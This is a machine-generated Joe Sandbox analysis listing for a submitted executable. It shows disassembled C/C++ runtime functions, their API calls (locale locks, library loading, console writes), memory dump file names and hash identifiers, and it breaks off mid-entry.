                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID: R[b
                                                                    • API String ID: 1740715915-1787471655
                                                                    • Opcode ID: 1140cfad6d06977655662a3bf037d8b24dbf69d00e817d75642c76956baf74a1
                                                                    • Instruction ID: 5e440a87e11486ffce2679f81c8f2e8c1ffa2b53bc96b23f3e8277ac6d1e68bb
                                                                    • Opcode Fuzzy Hash: 1140cfad6d06977655662a3bf037d8b24dbf69d00e817d75642c76956baf74a1
                                                                    • Instruction Fuzzy Hash: 2351DF72601A269FDB25AF94F845BBA73E7EF10310F24452DE80587292E7B1EC41CF92
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00624442
                                                                    • int.LIBCPMT ref: 00624455
                                                                      • Part of subcall function 006216B4: std::_Lockit::_Lockit.LIBCPMT ref: 006216C5
                                                                      • Part of subcall function 006216B4: std::_Lockit::~_Lockit.LIBCPMT ref: 006216DF
                                                                    • std::_Facet_Register.LIBCPMT ref: 00624488
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0062449E
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 006244A9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                    • String ID:
                                                                    • API String ID: 2081738530-0
                                                                    • Opcode ID: b316afacb64bcff1ca339fdd37669927ea77426a22303129ef143ce0898ae8b0
                                                                    • Instruction ID: 1d1cd82d31dd2efeb35345c93a5d97d5ba5aea67b4a0fc547872cd52d6a5bd64
                                                                    • Opcode Fuzzy Hash: b316afacb64bcff1ca339fdd37669927ea77426a22303129ef143ce0898ae8b0
                                                                    • Instruction Fuzzy Hash: A401DF72504934ABCB25EB64F9059AD77AADF913A0B20055DF806AB290DF309E41CF88
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00623DBD
                                                                    • int.LIBCPMT ref: 00623DD0
                                                                      • Part of subcall function 006216B4: std::_Lockit::_Lockit.LIBCPMT ref: 006216C5
                                                                      • Part of subcall function 006216B4: std::_Lockit::~_Lockit.LIBCPMT ref: 006216DF
                                                                    • std::_Facet_Register.LIBCPMT ref: 00623E03
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00623E19
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00623E24
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                    • String ID:
                                                                    • API String ID: 2081738530-0
                                                                    • Opcode ID: 64624d9b35e1890607da822ac13fe0a8c0d0eb46ec42ca7fc41729cb75cafd62
                                                                    • Instruction ID: 085d6670201f474bf6067440a959b631711b7c7fe76f7de5517e5dc0d562466d
                                                                    • Opcode Fuzzy Hash: 64624d9b35e1890607da822ac13fe0a8c0d0eb46ec42ca7fc41729cb75cafd62
                                                                    • Instruction Fuzzy Hash: C401D472504938ABCB25AB54FD0589D776BDF90760B21154DF8016B391DF349E01CF84
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00624315
                                                                    • int.LIBCPMT ref: 00624328
                                                                      • Part of subcall function 006216B4: std::_Lockit::_Lockit.LIBCPMT ref: 006216C5
                                                                      • Part of subcall function 006216B4: std::_Lockit::~_Lockit.LIBCPMT ref: 006216DF
                                                                    • std::_Facet_Register.LIBCPMT ref: 0062435B
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00624371
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0062437C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                    • String ID:
                                                                    • API String ID: 2081738530-0
                                                                    • Opcode ID: bd20859479942bca4673edfd67f573d68e22bc1ff9383c20d97e17691c7539e7
                                                                    • Instruction ID: 2b17681cea677b3b234afa1885b25bd6eac7fbe9fcf9dad94260996d4910502d
                                                                    • Opcode Fuzzy Hash: bd20859479942bca4673edfd67f573d68e22bc1ff9383c20d97e17691c7539e7
                                                                    • Instruction Fuzzy Hash: B901A232904D38ABCB25EF64B9058DD7BAB9F95760B20055DF805AB291DF309E05CFC8
                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 00669626
                                                                      • Part of subcall function 00668E77: __getptd_noexit.LIBCMT ref: 00668E7A
                                                                      • Part of subcall function 00668E77: __amsg_exit.LIBCMT ref: 00668E87
                                                                    • __getptd.LIBCMT ref: 0066963D
                                                                    • __amsg_exit.LIBCMT ref: 0066964B
                                                                    • __lock.LIBCMT ref: 0066965B
                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0066966F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                    • String ID:
                                                                    • API String ID: 938513278-0
                                                                    • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                                    • Instruction ID: 1456a1021a39afc97dc26de24f048d6bfff1cc7e4dc284f062f8955b02868b8d
                                                                    • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                                    • Instruction Fuzzy Hash: 9FF09032A447109AEBA1BB789802B5D33A6AF00728F55424EF814E72D3CF355941DBAE
                                                                    APIs
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0062A09F
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0062A153
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: R[b$csm
                                                                    • API String ID: 3480331319-2319284495
                                                                    • Opcode ID: 9179637c9d530a82bf4e41dd74be5632d23b13ada113f4b044d0e3e01fa91593
                                                                    • Instruction ID: 79916b4b9528d66ff74a9b9da716344d5fff59c1e81d9ec53650cdf6208601f6
                                                                    • Opcode Fuzzy Hash: 9179637c9d530a82bf4e41dd74be5632d23b13ada113f4b044d0e3e01fa91593
                                                                    • Instruction Fuzzy Hash: 6C41B534A00628DBCF10DFA8D885AEE7BB7EF45324F148159E8145B392C771DA55CF91
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0062B353,00000000,?,0069B6DC,?,?,?,0062B4F6,00000004,InitializeCriticalSectionEx,00644BD8,InitializeCriticalSectionEx), ref: 0062B3AF
                                                                    • GetLastError.KERNEL32(?,0062B353,00000000,?,0069B6DC,?,?,?,0062B4F6,00000004,InitializeCriticalSectionEx,00644BD8,InitializeCriticalSectionEx,00000000,?,0062B2AD), ref: 0062B3B9
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0062B3E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3177248105-2084034818
                                                                    • Opcode ID: 193819baa534455c1bc08de7408e43bbf3ff028e09cb97791059b4586db4ff77
                                                                    • Instruction ID: fd97746e6c108c1b51d51a21a3b0db221612bf7e3cae2f654e4590c1a5ec4f85
                                                                    • Opcode Fuzzy Hash: 193819baa534455c1bc08de7408e43bbf3ff028e09cb97791059b4586db4ff77
                                                                    • Instruction Fuzzy Hash: 29E01A34684214B7EB216FB1EC4AB9D3B5AEF01B41F201121FA0CE82E1EB619A508A84
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(0C77E109,00000000,00000000,00000000), ref: 006377AA
                                                                      • Part of subcall function 0063952A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00638FD3,?,00000000,-00000008), ref: 006395D6
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00637A05
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00637A4D
                                                                    • GetLastError.KERNEL32 ref: 00637AF0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                    • String ID:
                                                                    • API String ID: 2112829910-0
                                                                    • Opcode ID: 49e59cfc7667867b050d8137822fbdeed779daacddab0641821f4d13fbbc695e
                                                                    • Instruction ID: 8ee5b8962023e1079cc6b0e84955820d834ac10b17bf21729c96f9074aa63e1f
                                                                    • Opcode Fuzzy Hash: 49e59cfc7667867b050d8137822fbdeed779daacddab0641821f4d13fbbc695e
                                                                    • Instruction Fuzzy Hash: 10D159B5E042599FCB15CFA8D880AEDBBB6FF49310F18416AE865E7351D730A942CB90
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,0063F713,00000000,00000001,00000000,00000000,?,00637B44,00000000,00000000,00000000), ref: 00640706
                                                                    • GetLastError.KERNEL32(?,0063F713,00000000,00000001,00000000,00000000,?,00637B44,00000000,00000000,00000000,00000000,00000000,?,006380CB,00000000), ref: 00640712
                                                                      • Part of subcall function 006406D8: CloseHandle.KERNEL32(FFFFFFFE,00640722,?,0063F713,00000000,00000001,00000000,00000000,?,00637B44,00000000,00000000,00000000,00000000,00000000), ref: 006406E8
                                                                    • ___initconout.LIBCMT ref: 00640722
                                                                      • Part of subcall function 0064069A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006406C9,0063F700,00000000,?,00637B44,00000000,00000000,00000000,00000000), ref: 006406AD
                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,0063F713,00000000,00000001,00000000,00000000,?,00637B44,00000000,00000000,00000000,00000000), ref: 00640737
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: db02daa1af0310a8c415b70e32b3e03c5eae3f98193de73222246509c6a1b906
                                                                    • Instruction ID: f8761cc06e45dd06509ab40cb0ce42121285f13146786dc836abfbf0fce6fca4
                                                                    • Opcode Fuzzy Hash: db02daa1af0310a8c415b70e32b3e03c5eae3f98193de73222246509c6a1b906
                                                                    • Instruction Fuzzy Hash: 4DF01C3A500168BBDF622F95DC089C93FA7FB4A3A1B115010FB1A96620CA328920EF95
                                                                    APIs
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,006409EF), ref: 006410AC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DecodePointer
                                                                    • String ID: Lid$R[b
                                                                    • API String ID: 3527080286-3876915504
                                                                    • Opcode ID: a0861a290d2d7e102913b937cdbfbe9fd73435a3fbef79d69def13d1b5717d84
                                                                    • Instruction ID: 8cc985b452c6c74d092199c3d5cd120dfa1a74abfa46fce1e721dd28ca6d381d
                                                                    • Opcode Fuzzy Hash: a0861a290d2d7e102913b937cdbfbe9fd73435a3fbef79d69def13d1b5717d84
                                                                    • Instruction Fuzzy Hash: 54517C7190060ADBCF109FA9E9481FEBFB7FB0B304F104145E591EB354CBB48AAA8B55
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Fputc
                                                                    • String ID: R[b
                                                                    • API String ID: 3078413507-1787471655
                                                                    • Opcode ID: 329ad0904338c5267d3225898346fd964a8fa425f9a414cdd5175d85b7a7946c
                                                                    • Instruction ID: ca19a74840a8514acc44290936b18a28186f7fc3f3130e1c0fcdfe4efca0e5b7
                                                                    • Opcode Fuzzy Hash: 329ad0904338c5267d3225898346fd964a8fa425f9a414cdd5175d85b7a7946c
                                                                    • Instruction Fuzzy Hash: C1416136911A2AABCF24DF64E5409EDB7BAFF09311B14406AE542A7780E731FD51CF90
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 0062A992
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 8162a3f4d12c6162d9d8d61c1ec5ef7655382b5d0840f6fe4def7798d75f8dae
                                                                    • Instruction ID: f50df7d43c469ee585bae6ddcf80c817cd1c4fd9af42456406b788536f1af05d
                                                                    • Opcode Fuzzy Hash: 8162a3f4d12c6162d9d8d61c1ec5ef7655382b5d0840f6fe4def7798d75f8dae
                                                                    • Instruction Fuzzy Hash: 21414A71900619EFCF16DF98DE81AEEBBB6BF48300F198099F904A7211D3769990DF52
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __aulldiv
                                                                    • String ID: @
                                                                    • API String ID: 3732870572-2766056989
                                                                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                    • Instruction ID: 7db6bdf5f79d77744cd52a4e28977eb4a51b7c59653076a0203540cd1f33e344
                                                                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                    • Instruction Fuzzy Hash: 31211DB1E44218ABDB10DFD4CC4AFAEB7B9FB45B10F104519F605BB280D779A9018BA5
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00625113
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0062516F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                    • String ID: R[b
                                                                    • API String ID: 593203224-1787471655
                                                                    • Opcode ID: 48bd41268b4f88e31f586e291f7828a5b4948653bfad71313ce59f61a5f3ec53
                                                                    • Instruction ID: 0bd3feae0f7d3c06c35223bcbe817db33c4541200a648eb7e43c40b8884c0a51
                                                                    • Opcode Fuzzy Hash: 48bd41268b4f88e31f586e291f7828a5b4948653bfad71313ce59f61a5f3ec53
                                                                    • Instruction Fuzzy Hash: A9017135600A25EFCB15EF14E889E9D77BAEF86754B140099E806AB3A1DF70EE40CF50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __aulldiv
                                                                    • String ID: @
                                                                    • API String ID: 3732870572-2766056989
                                                                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                    • Instruction ID: d77018703e3caf0bacdbfb7f8305609d4bb4cd5e5eb413a7e30c836505e34d41
                                                                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                    • Instruction Fuzzy Hash: 8801FBB0980308FAEB10EBE0CC4AB9DBA7AFB04705F208459E60477280D6B559468B5A
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006215E6
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0062161E
                                                                      • Part of subcall function 00625178: _Yarn.LIBCPMT ref: 00625197
                                                                      • Part of subcall function 00625178: _Yarn.LIBCPMT ref: 006251BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
